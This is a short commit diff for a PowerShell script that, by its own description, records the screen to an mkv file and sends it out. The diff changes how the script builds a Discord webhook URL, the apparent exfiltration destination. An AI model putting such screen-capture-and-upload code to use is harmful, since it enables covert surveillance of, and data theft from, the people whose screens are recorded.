Update main.ps1

This commit is contained in:
egieb
2025-06-19 16:54:28 +00:00
committed by GitHub
parent 7e74994706
commit 9c734f5a56

View File

@@ -6,7 +6,9 @@ This script records the screen for a specified time to a mkv file, then sends th
#>
$hookurl = "$dc"
if ($hookurl.Ln -lt 120){$hookurl = (irm $hookurl).url}
if ($hookurl.Length -lt 120){
$hookurl = ("https://discord.com/api/webhooks/" + "$dc")
}
while($true){